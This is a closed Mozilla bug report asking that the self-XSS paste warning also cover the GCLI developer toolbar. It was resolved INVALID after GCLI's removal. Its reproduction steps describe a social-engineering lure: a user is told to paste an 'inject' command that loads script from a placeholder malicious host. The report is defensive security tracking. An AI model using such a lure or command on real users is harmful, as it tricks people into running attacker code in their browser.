Closed
Bug 1319381
Opened 8 years ago
Closed 6 years ago
The paste/dnd selfxss warning should also apply to the developer toolbar
Categories
(DevTools Graveyard :: Graphic Commandline and Toolbar, defect, P2)
DevTools Graveyard
Graphic Commandline and Toolbar
Tracking
(Not tracked)
RESOLVED
INVALID
People
(Reporter: Gijs, Unassigned)
References
Details
(Keywords: sec-want)
STR: 1. tell user to copy/paste "inject 'http://malicious.com/foo.js'" into the GCLI to see people who unfriended them / what their facebook friends really think about them / etc. ER: nopenopenopenopenope AR: we just let it happen
Comment 1•8 years ago
|
||
I think a fix for bug 1319382 would probably work here too.
Priority: -- → P2
Updated•6 years ago
|
Product: Firefox → DevTools
Comment 2•6 years ago
|
||
GCLI is going away with Firefox 62 (see bug 1461970). So there isn't a way to inject JS anymore in the way described here.
Status: NEW → RESOLVED
Closed: 6 years ago
Resolution: --- → INVALID
Updated•6 years ago
|
Product: DevTools → DevTools Graveyard
Updated•4 years ago
|
Group: firefox-core-security
You need to log in
before you can comment on or make changes to this bug.
Description
•